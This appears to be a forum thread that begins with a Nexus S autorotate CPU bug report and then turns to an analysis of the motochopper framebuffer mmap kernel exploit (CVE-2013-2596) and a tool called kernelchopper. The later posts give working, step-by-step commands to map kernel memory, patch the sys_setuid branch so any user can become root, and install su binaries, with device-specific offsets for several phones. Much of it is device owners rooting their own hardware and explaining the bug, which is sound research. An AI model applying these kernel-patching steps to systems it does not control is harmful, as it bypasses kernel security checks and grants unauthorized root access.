Related
Hi,
i have nexus S with IMM76D_deodexed. I had preciously 4.0.3, then 4.0.4 - IMM26. Now IMM76D, CWM.
With IMM76D I hoped all will be solved, but not.
before updating to IMM76D I did:
back to factory reset
format SD card
clean Dalvik
clean /system except /boot
Now i think, I'm only one, who has infamous autotate high cpu usage bug
- without autorotate (cpu usage is normal):
Code:
top -m 100 -d 1 -n 1 | head -20
User 0%, System 3%, IOW 0%, IRQ 0%
User 0 + Nice 0 + Sys 4 + Idle 99 + IOW 0 + IRQ 0 + SIRQ 0 = 103
PID PR CPU% S #THR VSS RSS PCY UID Name
11891 0 7% R 1 1000K 396K bg root top
11867 0 0% S 1 0K 0K fg root kworker/0:0
11814 0 0% S 11 273628K 23708K bg app_70 com.google.android.maps.mytracks
132 0 0% S 81 369556K 45464K fg system system_server
330 0 0% S 25 294536K 29760K fg radio com.android.phone
8 0 0% S 1 0K 0K fg root sync_supers
9 0 0% S 1 0K 0K fg root bdi-default
10 0 0% S 1 0K 0K fg root kblockd
11 0 0% S 1 0K 0K fg root khubd
12 0 0% S 1 0K 0K fg root kinteractiveup
14 0 0% S 1 0K 0K fg root kswapd0
15 0 0% S 1 0K 0K fg root fsnotify_mark
16 0 0% S 1 0K 0K fg root crypto
with autorotate - system_server
Code:
top -m 100 -d 1 -n 1 | head -20
User 7%, System 12%, IOW 0%, IRQ 0%
User 6 + Nice 2 + Sys 13 + Idle 85 + IOW 0 + IRQ 0 + SIRQ 0 = 106
PID PR CPU% S #THR VSS RSS PCY UID Name
132 0 14% S 81 369572K 45768K fg system system_server
12030 0 5% R 1 1004K 400K bg root top
200 0 3% S 17 285416K 33964K fg system com.android.systemui
78 0 2% S 8 42944K 16884K fg system /system/bin/surfaceflinger
290 0 0% S 1 2464K 636K fg wifi /system/bin/wpa_supplicant
223 0 0% S 1 0K 0K fg root dhd_dpc
11939 0 0% S 1 0K 0K fg root kworker/0:1
10 0 0% S 1 0K 0K fg root kblockd
11 0 0% S 1 0K 0K fg root khubd
12 0 0% S 1 0K 0K fg root kinteractiveup
14 0 0% S 1 0K 0K fg root kswapd0
15 0 0% S 1 0K 0K fg root fsnoti
again top with Threads
Code:
User 5%, System 12%, IOW 0%, IRQ 0%
User 15 + Nice 3 + Sys 39 + Idle 254 + IOW 0 + IRQ 0 + SIRQ 0 = 311
PID TID PR CPU% S VSS RSS PCY UID Thread Proc
132 146 0 7% D 369572K 45768K fg system system_server system_server
12028 12028 0 4% R 1192K 588K bg root top top
132 166 0 2% S 369572K 45768K fg system er$SensorThread system_server
132 148 0 2% S 369572K 45768K fg system er.ServerThread system_server
132 147 0 1% S 369572K 45768K fg system SensorService system_server
200 200 0 0% S 285416K 33964K fg system ndroid.systemui com.android.systemui
11864 11864 0 0% S 0K 0K fg root kworker/u:2
11939 11939 0 0% S 0K 0K fg root kworker/0:1
78 111 0 0% S 42944K 16884K fg system SurfaceFlinger /system/bin/surfaceflinger
132 187 0 0% S 369572K 45768K fg system WifiService system_server
What should i do?
edit:
strace is writing following block repeatedly like crazy
strace -f -T -v -p 132
Code:
(Timeout) <0.000037>
[pid 147] write(103, "h\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0pe\34d\2340\0\0\354\337\267?>\205\[email protected]\275"..., 104 <unfinished ...>
[pid 166] <... epoll_wait resumed> ) = 1 <0.031740>
[pid 166] read(102, "h\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0pe\34d\2340\0\0\354\337\267?>\205\[email protected]\275"..., 104) = 104 <0.000034>
[pid 166] clock_gettime(CLOCK_MONOTONIC, {53448, 257720074}) = 0 <0.000030>
[pid 166] write(46, "W"..., 1) = 1 <0.000278>
[pid 166] read(102, 0x519ebb80, 104) = -1 EAGAIN (Resource temporarily unavailable) <0.000032>
[pid 166] epoll_wait(0x6a, 0x519eb9f0, 0x10, 0xffffffff <unfinished ...>
[pid 148] <... epoll_wait resumed> ) = 1 <0.029798>
[pid 148] read(45, "W"..., 16) = 1 <0.000038>
[pid 148] clock_gettime(CLOCK_MONOTONIC, {53448, 261245950}) = 0 <0.000035>
[pid 148] getpid() = 132 <0.000090>
[pid 148] getuid32() = 1000 <0.000029>
[pid 148] epoll_wait(0x2f, 0x50787a90, 0x10, 0) = 0 <0.000032>
[pid 148] clock_gettime(CLOCK_MONOTONIC, {53448, 263335575}) = 0 <0.000276>
[pid 148] epoll_wait(0x2f, 0x50787a90, 0x10, 0xa6d7 <unfinished ...>
[pid 147] <... write resumed> ) = 104 <0.008302>
[pid 147] poll([{fd=37, events=POLLIN}, {fd=38, events=POLLIN}, {fd=42, events=POLLIN}, {fd=43, events=POLLIN}, {fd=41, events=POLLIN}], 5, -1 <unfinished ...>
[pid 146] <... write resumed> ) = 16 <0.012667>
[pid 146] ioctl(39, 0x80066108, 0x50587ec0) = 0 <0.016268>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\2\0\0\0]\1\0\0"..., 16) = 16 <0.000044>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\2\0\1\0J\0\0\0"..., 16) = 16 <0.000300>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\2\0\2\0G\1\0\0"..., 16) = 16 <0.000039>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 16 <unfinished ...>
[pid 147] <... poll resumed> ) = 1 ([{fd=42, revents=POLLIN}]) <0.021342>
[pid 147] read(42, "\310\320\0\0\352P\4\0\2\0\0\0]\1\0\0\310\320\0\0\333T\4\0\2\0\1\0J\0\0\0\310"..., 512) = 64 <0.000039>
[pid 147] poll([{fd=37, events=POLLIN}, {fd=38, events=POLLIN}, {fd=42, events=POLLIN}, {fd=43, events=POLLIN}, {fd=41, events=POLLIN}], 5, 0) = 0
Hey dude,
No, you are not the only one with the auto-rotate bug. I have it too, but im on stock, non rooted ICS 4.0.4 for the Nexus S. But I can't help you either
Just wanted you to know that you are not alone.
what are the symptoms of this bug? every since i loaded 4.0.4, my phone seems to be eating up battery like crazy, also freezing up and shutting off randomly. sounds like it could be my problem.
should i just disable the auto-rotate setting for now?
00Hensley said:
what are the symptoms of this bug? every since i loaded 4.0.4, my phone seems to be eating up battery like crazy, also freezing up and shutting off randomly. sounds like it could be my problem.
should i just disable the auto-rotate setting for now?
Click to expand...
Click to collapse
It's worth a try, you can't damage anything if you do
I've been using the attached patch (against the stock ICS 3.0 kernel source, but should apply to any Nexus S 2.6.35 ICS or 3.0 kernel), which throttles the orientation sensor device and reduces system_server CPU usage to a more reasonable 2-3% (similar to Gingerbread).
Thanks for confirmation.
based on the confirmation there is new bug from me:
xxxttp://code.google.com/p/android/issues/detail?id=29965
For quick autorotate on and off i'm using quick app:
xxxttps://play.google.com/store/apps/details?id=com.friedflow.autorotate&feature=order_history
Thanks for the kernel patch... but i think, i will not building kernel...
i don't understand, why these bugs are not fixed yet... Like USB slow file transfer...
steven676 said:
I've been using the attached patch (against the stock ICS 3.0 kernel source, but should apply to any Nexus S 2.6.35 ICS or 3.0 kernel), which throttles the orientation sensor device and reduces system_server CPU usage to a more reasonable 2-3% (similar to Gingerbread).
Click to expand...
Click to collapse
How's this patching working out for you? Any side effects to watch out for? Also, did you find anything more refined along the way?
Thanks!
InstigatorX said:
How's this patching working out for you? Any side effects to watch out for? Also, did you find anything more refined along the way?
Click to expand...
Click to collapse
I've been carrying this patch since December with absolutely no ill effects, and given that it works, I haven't bothered to look for better solutions ...
steven676 said:
I've been carrying this patch since December with absolutely no ill effects, and given that it works, I haven't bothered to look for better solutions ...
Click to expand...
Click to collapse
Any hints how to apply this patch?
I ran the motochopper[1] "pwn" binary under an unprivileged shell on my CM10.1 Nexus 7 (Tegra chipset, codename "grouper"), and was surprised to find that it gained administrative privileges by changing all "shell"-owned (uid 2000) processes on the system to run as uid 0.
It was somewhat worrying to see that an up-to-date ROM had an unpatched vulnerability, and I was concerned about whether rogue apps could leverage it. The CVE entry[2] was surprisingly vague, compounding my suspicions.
Further investigation indicated that motochopper is running a series of syscalls from within a SIGTRAP handler to thwart tracing:
Code:
1662 [4019c940] sigaction(0x5, 0xbecfdcc8, 0xbecfdcc8) = 0
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill(0x67e, 0x5) = 0
1662 [4019d160] kill(0, 0x5) = 0x5
1662 [4019c940] sigaction(0, 0xbecfdcb0, 0xbecfdcb0) = 0x5
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill() = 0
1662 [4019c940] sigaction(0x5, 0xbecfdcb0, 0xbecfdcb0) = 0
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill(0x67e, 0x5) = 0
1662 [4019d160] kill(0, 0x5) = 0x5
1662 [4019c940] sigaction(0, 0xbecfdcb0, 0xbecfdcb0) = 0x5
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill() = 0
After disassembling the binary and patching it to invoke the syscalls directly, it looks like the problem involves the framebuffer driver. First, after opening a bunch of other (irrelevant, possibly decoy) devices, the exploit probes the real size of the framebuffer:
Code:
1728 open("/dev/graphics/fb0", O_RDWR) = 6
...
1728 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x400f2000
1728 munmap(0x400f2000, 4096) = 0
1728 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x40011000
1728 munmap(0x40011000, 8192) = 0
1728 mmap2(NULL, 12288, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x4006a000
1728 munmap(0x4006a000, 12288) = 0
...
1728 mmap2(NULL, 9433088, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x4015b000
1728 munmap(0x4015b000, 9433088) = 0
1728 mmap2(NULL, 9437184, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x4015b000
1728 munmap(0x4015b000, 9437184) = 0
1728 mmap2(NULL, 9441280, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = -1 EINVAL (Invalid argument)
Then it tries to map the largest possible region into the process' address space:
Code:
1728 mmap2(NULL, 2415919104, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x70900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2399141888, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x71900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2382364672, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x72900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2365587456, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x73900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2348810240, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x74900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2332033024, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x75900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2315255808, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x76900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2298478592, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x77900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2281701376, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x78900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2264924160, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x79900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2248146944, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7a900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2231369728, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7b900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2214592512, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7c900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2197815296, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7d900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2181038080, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7e900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2164260864, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7f900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2147483648, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x80900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2130706432, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x81900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2113929216, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x82900) = 0x4015b000
Clearly, a 2GB mapping on a 1GB device should not have succeeded; apparently this overlaps with kernel memory and the exploit is able to iterate through the task_struct / creds to change the uid 2000 processes to uid 0:
Code:
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 0
1728 getuid32() = 0
1728 write(1, "[+] Success!\n", 13) = 13
Checking the perms on /dev/graphics/fb0, it looks like most apps will not have access to this device (though the "graphics" group) and would not be able to directly use this exploit.
Some unanswered questions:
Does this exploit target the kernel's framebuffer infrastructure itself, or only specific drivers? I did not see any obvious fixes along the Linux 3.0 -stable branch, nor did I see any recent Asus kernel commits in the CM github repo.
Why was the binary built with -fPIC and -O0? Is this a form of obfuscation?
What is the significance of probing the framebuffer size? Is it meaningful that 9437184 = 0x900000, and the first mmap() length attempt was 2415919104 = 0x90000000?
[1] http://forum.xda-developers.com/showthread.php?t=2252248
[2] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2596
Edit:
Some recent changes were made to fbmem.c:fb_mmap() in mainline:
http://www.spinics.net/lists/stable/msg06210.html
https://lkml.org/lkml/2013/4/23/623
There is no custom fb_mmap() in Tegra's fb_ops struct.
Seeing the kernel maintainers madly rush to backport this innocuous-looking helper function to ancient releases like Linux 3.0, right around the same time motochopper was released (4/9), suggests that they might be trying to clean up a vulnerability in the framebuffer core.
Edit #2:
After staring at the code a little longer (and finally realizing that mmap2() takes a PAGE offset as its last argument, not a BYTE offset), here is what I see:
Code:
static int
fb_mmap(struct file *file, struct vm_area_struct * vma)
{
struct fb_info *info = file_fb_info(file);
struct fb_ops *fb;
unsigned long off;
unsigned long start;
u32 len;
if (!info)
return -ENODEV;
if (vma->vm_pgoff > (~0UL >> PAGE_SHIFT))
return -EINVAL;
off = vma->vm_pgoff << PAGE_SHIFT;
fb = info->fbops;
if (!fb)
return -ENODEV;
mutex_lock(&info->mm_lock);
if (fb->fb_mmap) {
int res;
res = fb->fb_mmap(info, vma);
mutex_unlock(&info->mm_lock);
return res;
}
/* frame buffer memory */
start = info->fix.smem_start;
[color=red]len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.smem_len);[/color]
if (off >= len) {
/* memory mapped io */
off -= len;
if (info->var.accel_flags) {
mutex_unlock(&info->mm_lock);
return -EINVAL;
}
start = info->fix.mmio_start;
len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
}
mutex_unlock(&info->mm_lock);
start &= PAGE_MASK;
[color=blue]if ((vma->vm_end - vma->vm_start + off) > len)
return -EINVAL;[/color]
off += start;
vma->vm_pgoff = off >> PAGE_SHIFT;
/* This is an IO map - tell maydump to skip this VMA */
vma->vm_flags |= VM_IO | VM_RESERVED;
vma->vm_page_prot = vm_get_page_prot(vma->vm_flags);
fb_pgprotect(file, vma, off);
[color=green]if (io_remap_pfn_range(vma, vma->vm_start, off >> PAGE_SHIFT,
vma->vm_end - vma->vm_start, vma->vm_page_prot))[/color]
return -EAGAIN;
return 0;
}
The initial mmap2/munmap sequence is trying to deduce the rounded smem_len + (smem_start partial page byte) value (len) by trying successively larger values until the check in blue returns -EINVAL. Result: 9437184 = 0x900000 (i.e. the framebuffer size is 9MB).
fb_mmap() is funny in that offsets 0 through (len-1) map the framebuffer, but offset (len) maps byte 0 of mmio_start. Which looks to be uninitialized (zero) in the Tegra driver.
The second sequence of mmap2() calls is trying to find the largest possible mapping. The kernel mmap2() syscall returns -ENOMEM if the mapping is too large for the virtual address space available to the process; fb_mmap() is not even called if this happens. When fb_mmap() is eventually called:
Page offset = 0x82900
Byte offset = off = 0x82900 << PAGE_SHIFT = 0x8290_0000
len = 0x90_0000 and "off" is much larger than len, so this hits the MMIO case. len is subtracted from off, leaving 0x8200_0000. Since the offset is so large, the length check in blue overflows: the VMA size of 0x7e00_0000 plus a len of 0x8200_0000 comes out to exactly 0x1_0000_0000; truncated to 32 bits this is zero. This passes the sanity test, so the code in green happily creates a read-write mapping starting at physical address 0 (mmio_start) and covering all of kernel memory.
So basically motochopper is exploiting an unpublicized (but belatedly patched) kernel bug in fbmem.c.
I'm posting a new, open source utility called "kernelchopper" which uses djrbliss' fb_mmap exploit to allow the advanced user to explore and modify kernel memory on a non-rooted system.
kernelchopper employs a few extra refinements to maximize the amount of kernel memory exposed to the user application:
1) It is built and linked statically using the Linaro glibc toolchain, because dynamically linked Bionic binaries tend to map libraries and other stuff in the 0x4000_0000 user address range - a critical part of the address space that we'd like to reserve for the kernel memory mapping
2) It uses MAP_FIXED to force the kernel to use the lowest VA available, and adjusts the base address until it finds a mutually agreeable number
On my Nexus 7 I was able to map PA range 0x5000_0000 - 0xffff_ffff. On Tegra systems, system RAM starts at PA 0x8000_0000 (= kernel VA 0xc000_0000), so it is trivial to patch the kernel image in place.
Sample usage:
A quick check of /proc/iomem shows that physical memory starts at PA 0x8000_0000; the decompressed kernel image lives at VA 0xc000_8000 (ARM 3GB/1GB standard) = PA 0x8000_8000. Make a note of this for later:
Code:
80000000-beafffff : System RAM
80008000-80900a57 : Kernel text
80944000-80b841af : Kernel data
Since I built my ROM from source, I have a kernel image with full symbols. Install binutils-multiarch and disassemble with "objdump -d vmlinux":
Code:
c0077650 <sys_setuid>:
c0077650: e92d40f8 push {r3, r4, r5, r6, r7, lr}
c0077654: e1a05000 mov r5, r0
c0077658: eb0040d6 bl c00879b8 <prepare_creds>
c007765c: e2504000 subs r4, r0, #0
c0077660: 0a000027 beq c0077704 <sys_setuid+0xb4>
c0077664: e1a0200d mov r2, sp
c0077668: e3c23d7f bic r3, r2, #8128 ; 0x1fc0
c007766c: e3c3303f bic r3, r3, #63 ; 0x3f
c0077670: e3a00007 mov r0, #7
c0077674: e593300c ldr r3, [r3, #12]
c0077678: e59362fc ldr r6, [r3, #764] ; 0x2fc
c007767c: ebffd80f bl c006d6c0 <nsown_capable>
c0077680: e3500000 cmp r0, #0
[color=red]c0077684: 1a00000a bne c00776b4 <sys_setuid+0x64>[/color]
Forcing the branch in red to be taken unconditionally will allow any user to setuid() to any UID, bypassing the kernel's security checks. This is easy to do with kernelchopper. First verify that the code matches the disassembly:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper d 80077650 40
80077650: f8 40 2d e9 00 50 a0 e1 d6 40 00 eb 00 40 50 e2
80077660: 27 00 00 0a 0d 20 a0 e1 7f 3d c2 e3 3f 30 c3 e3
80077670: 07 00 a0 e3 0c 30 93 e5 fc 62 93 e5 0f d8 ff eb
80077680: 00 00 50 e3 [color=red]0a 00 00 1a[/color] 04 30 96 e5 05 00 53 e1
The little-endian word at PA 0x8007_7684 is 0a 00 00 1a = 0x1a00_000a. Let's change the instruction word to make it unconditional, and then invoke kernelchopper again to setuid() and spawn a shell:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper m 80077684
1a00000a
[email protected]:/data/local/tmp $ ./kernelchopper m 80077684 ea00000a
[email protected]:/data/local/tmp $ ./kernelchopper shell
[email protected]:/data/local/tmp # id
uid=0(root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
At this point you can remount /system read-write, install an "su" binary in /system/xbin, make the "su" binary setuid root, and install Superuser/SuperSU. You will probably want to reboot soon because any other process running on the system can also get root until the virgin kernel is reloaded, if it somehow knows to try.
kernelchopper can also dump ranges of memory (and/or your kernel image) to a file, for offline analysis. This can help in locating things that you might want to change.
Code:
[email protected]:/data/local/tmp $ ./kernelchopper d 80077650 bc setuid.bin
[email protected]:/data/local/tmp $ hexdump -C setuid.bin
00000000 f8 40 2d e9 00 50 a0 e1 d6 40 00 eb 00 40 50 e2 |[email protected] [user=457974]@...[/user]@P.|
00000010 27 00 00 0a 0d 20 a0 e1 7f 3d c2 e3 3f 30 c3 e3 |'.... ...=..?0..|
00000020 07 00 a0 e3 0c 30 93 e5 fc 62 93 e5 0f d8 ff eb |.....0...b......|
00000030 00 00 50 e3 0a 00 00 ea 04 30 96 e5 05 00 53 e1 |..P......0....S.|
00000040 10 00 00 0a 0c 30 94 e5 05 00 53 e1 00 70 e0 13 |.....0....S..p..|
00000050 0c 00 00 0a 04 00 a0 e1 34 41 00 eb 07 00 a0 e1 |........4A......|
00000060 f8 80 bd e8 04 50 84 e5 0c 50 84 e5 04 30 96 e5 |.....P...P...0..|
00000070 05 00 53 e1 03 00 00 0a 04 00 a0 e1 97 fc ff eb |..S.............|
00000080 00 70 50 e2 f2 ff ff ba 14 50 84 e5 04 00 a0 e1 |.pP......P......|
00000090 1c 50 84 e5 06 10 a0 e1 01 20 a0 e3 cb 61 06 eb |.P....... ...a..|
000000a0 00 70 50 e2 ea ff ff ba 04 00 a0 e1 f8 40 bd e8 |[email protected]|
000000b0 32 41 00 ea 0b 70 e0 e3 e7 ff ff ea |2A...p......|
000000bc
It is often possible to dump the kernel image range from /proc/iomem and either extract the kallsyms information, or compare code sequences to a similar kernel for which you do have symbols. This would allow you to locate interesting functions like sys_setuid() in unfamiliar images.
@SW686,
Many, many thanks to you for your work on this.
Applying the latest OTA update for my ASUS TF700T left it in an almost unusable state due to some core frameworks not getting their permissions set properly. Fortunately, I still had ADB access, I just needed to get superuser privileges to fix the problem.
In the course of doing my research on how motochopper works so as to write my own exploit, I came across your posts. The clear and detailed explanations are excellent and saved me a great deal of time. Your kernelchopper did its job beautifully and allowed me to obtain a root shell and get my tab back to fully working condition. Although, admittedly, I was looking forward to the fun of writing my own hack. Thank you, again!
Cheers!
P.S. If you have a PayPal account and are so inclined, PM me your addy so I may send you a few dollars in appreciation.
doesn't seem to work on my Acer A700.
patched like 3 setuid offsets to ea00000a, ./kernelchopper shell still giving me
setuid() failed: Operation not permitted
that's that try to root the device with locked bootloader.
nex86 said:
doesn't seem to work on my Acer A700.
patched like 3 setuid offsets to ea00000a, ./kernelchopper shell still giving me
setuid() failed: Operation not permitted
that's that try to root the device with locked bootloader.
Click to expand...
Click to collapse
What's the version of the ROM you're running?
Rv16rc01 (Android 4.1.1)
I know there is a way to root it with an insecure boot.img, but that requires to unlock the bootloader.
It's just that there are people who want to root it without unlocking it, because there is no way to relock it.
nex86 said:
Rv16rc01 (Android 4.1.1)
Click to expand...
Click to collapse
OK, so the instruction to modify and its location are a bit different due to a combination of Acer building the kernel optimized for size and using (I believe) GCC 4.6. The instruction offset is 0x0006d258 and the instruction to modify is 0x0a000009.
These commands assume the kernel image starts at address 0x80008000. You can verify this using the command:
Code:
grep -Ei 'kernel (code|text)' /proc/iomem
The new set of commands and their output are:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper m 80075258
0a000009
[email protected]:/data/local/tmp $ ./kernelchopper m 80075258 eaffffff
[email protected]:/data/local/tmp $ ./kernelchopper shell
[email protected]:/data/local/tmp # id
uid=0(root) [snipped]
This should give you root privileges and let you proceed with the rest of the rooting process.
Out of curiosity, did you try to just run motochopper? It will push over the superuser application and binary for you and doesn't require modifying the kernel memory by hand.
Rooted Galaxy Express I8730T
Hi,
Just want to share my success in using 'kernelchopper' for Galaxy Express.
Following are information about the address location
./kernelchopper m 802806ec ea00000a
and files that I was able to copied over
/data/local/tmp/busybox mount -o remount,rw /system
/data/local/tmp/busybox mv /data/local/tmp/su /system/xbin/su
/data/local/tmp/busybox mv /data/local/tmp/Superuser.apk /system/app/Superuser.apk
/data/local/tmp/busybox cp /data/local/tmp/busybox /system/xbin/busybox
chown 0.0 /system/xbin/su
chmod 06755 /system/xbin/su
chmod 655 /system/app/Superuser.apk
chmod 755 /system/xbin/busybox
I'm attaching few screenshots I took
Some more screenshots
Attaching few more pictures
Hi people,
First I have to say I admire your knowledge. I have a ZTE Blade G phone that hasn't been rooted yet. I figured the motocopper exploit might help, since the phone has MSM8225 SoC and it runs 4.1.2 android. It would not work. It actually wrote success once, but didn't actually get root. Now it just writes Bus Error. Now, I've poked a little with kernelchopper, but my /proc/iomem says quite a different thing from yours, presumably because the phone has just 512MB ram. If I try to dump any addresses above 80008000, it writes bus error. Here's the output:
Code:
00200000-0fbfffff : System RAM
00208000-00a48c6b : Kernel code
00a80000-00d33a23 : Kernel data
0fc01000-0fcfffff : System RAM
0fd01000-0fdfffff : System RAM
0fe01000-0fffffff : System RAM
20000000-296fffff : System RAM
a0000000-a001ffff : kgsl_3d0_reg_memory
a0000000-a001ffff : kgsl-3d0
a0200000-a0200fff : msm_serial_hs.0
a0300000-a0300fff : uartdm_resource
a0300000-a0300fff : msm_serial_hsl
I don't really know what this means, but I know in your program you don't allow addresses below 0x50000000, so it won't work. I figured I would kind of dump the whole kernel ram and search for similar commands. I don't even know how, but I figure it would be fun. So, can you point me in the right direction here? I'm a noob, but I want to learn. BTW, for my phone, there isn't any recovery image or I could disassemble, and the bootloader seems to be locked too.
fluxx_srb said:
I don't even know how, but I figure it would be fun. So, can you point me in the right direction here? I'm a noob, but I want to learn.
Click to expand...
Click to collapse
Hi fluxx_srb,
I can have a go at walking you through this if you'd like.
The prerequisites are: a LInux system with an ARM cross-compilation setup, the Linux kernel for your device (I usually get this from the firmware package provided by the OEM), and a copy of the kernel source used for the device (again, from the OEM).
Once you've got all these in place, then we can move on the technical nitty-gritty.
tried it, but it always crashes with android itself when read/write memory.
i have sony walkman nw-f807 (tegra 2 with 512mb ram) which isnt rooted yet, i've tried myself with some exploits like perf_events and diaggetroot, but didnt work.
Code:
00000000-163fffff : System RAM
0003b000-006156f3 : Kernel text
00616000-007aaeef : Kernel data
16400000-164fffff : ram_console
16500000-167fffff : fbmem
50000000-50023fff : tegra_grhost
50000000-50023fff : tegra_grhost
54040000-5407ffff : tegra_grhost
54040000-5407ffff : mpe
54080000-540bffff : tegra_grhost
54080000-540bffff : vi
54100000-5413ffff : tegra_grhost
54100000-5413ffff : isp
54200000-5423ffff : regs
54200000-5423ffff : tegra_grhost
54200000-5423ffff : tegradc
54240000-5427ffff : tegra_grhost
58000000-59ffffff : gart
60005000-60005007 : tegra_wdt
60005000-60005007 : tegra_wdt
60006000-60006003 : tegra_wdt
60006000-60006003 : tegra_wdt
60010000-60010fff : tegra-aes
6001a000-6001dbff : tegra-aes
70000c00-70000c7f : tegra20-das
70000c00-70000c7f : tegra20-das
70002400-700025ff : tegra20-spdif
70002400-700025ff : tegra20-spdif
70002800-700028ff : tegra20-i2s.0
70002800-700028ff : tegra20-i2s
70002a00-70002aff : tegra20-i2s.1
70002a00-70002aff : tegra20-i2s
70006000-7000601f : serial
70006040-7000607f : tegra_uart.1
70006200-700062ff : tegra_uart.2
70006300-7000631f : serial
7000a000-7000a003 : tegra_pwm.0
7000a000-7000a003 : tegra_pwm
7000c000-7000c0ff : tegra-i2c.0
7000c000-7000c0ff : tegra-i2c
7000c400-7000c4ff : tegra-i2c.1
7000c400-7000c4ff : tegra-i2c
7000c500-7000c5ff : tegra-i2c.2
7000c500-7000c5ff : tegra-i2c
7000d000-7000d1ff : tegra-i2c.3
7000d000-7000d1ff : tegra-i2c
7000d800-7000d9ff : spi_tegra.2
7000d800-7000d9ff : spi_tegra.2
7000e200-7000e2ff : tegra-kbc
7000e200-7000e2ff : tegra-kbc
7000f000-7000f3ff : mc
c5000000-c5003fff : fsl-tegra-udc
c5000000-c5003fff : tegra-otg
c5000000-c5003fff : fsl-tegra-udc
c8000000-c80001ff : sdhci-tegra.0
c8000000-c80001ff : mmc1
c8000600-c80007ff : sdhci-tegra.3
c8000600-c80007ff : mmc0
didn't work on my "STILL UNROOTABLE" Nec 101T....
Rooting without bootloader unlock
Just rooted my Android without unlocking !!
fluxx_srb said:
my /proc/iomem says quite a different thing from yours, presumably because the phone has just 512MB ram. If I try to dump any addresses above 80008000, it writes bus error. Here's the output:
Code:
00200000-0fbfffff : System RAM
00208000-00a48c6b : Kernel code
00a80000-00d33a23 : Kernel data
Click to expand...
Click to collapse
becomingx said:
The prerequisites are: a Linux system with an ARM cross-compilation setup, the Linux kernel for your device (I usually get this from the firmware package provided by the OEM), and a copy of the kernel source used for the device (again, from the OEM)
Click to expand...
Click to collapse
Hello to all, I just got root on padfone 2 without unlocking and without these prerequisites. I used adt-bundle-linux-x86-20130729, grep and a compiler (try terminal IDE, or use gentooandroid.sourceforge.net ; if you trust the binaries attached to this message you do not need any compiler), then kernelchopper, then applied manually the end of exynos-abuse.
STEP 0: You may apply this on any Android system on your own risks. If your output of any instruction is not exactly as shown here, you should adapt following instructions accordingly (following color codes, and counting underlined words in hexadecimal notation), or better quit. If you do not get exactly all the outputs I colored here in red, you should QUIT or change previous instructions. If you have no internal microSD, I suggest to you to first chdir a directory of you computer which can host one file of size >4Gb (3898777809 bytes for my padfone 2, the day I bought it).
STEP 1: finding s_show->seq_printf format string found at: 0x80c281c6.
We first use adb to put all attached files (unzipped) in /data/data/com.spartacusrex.spartacuside/adb.
Code:
script backup_before_installing_su_to_disk
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/busybox /data/.tmp/grep
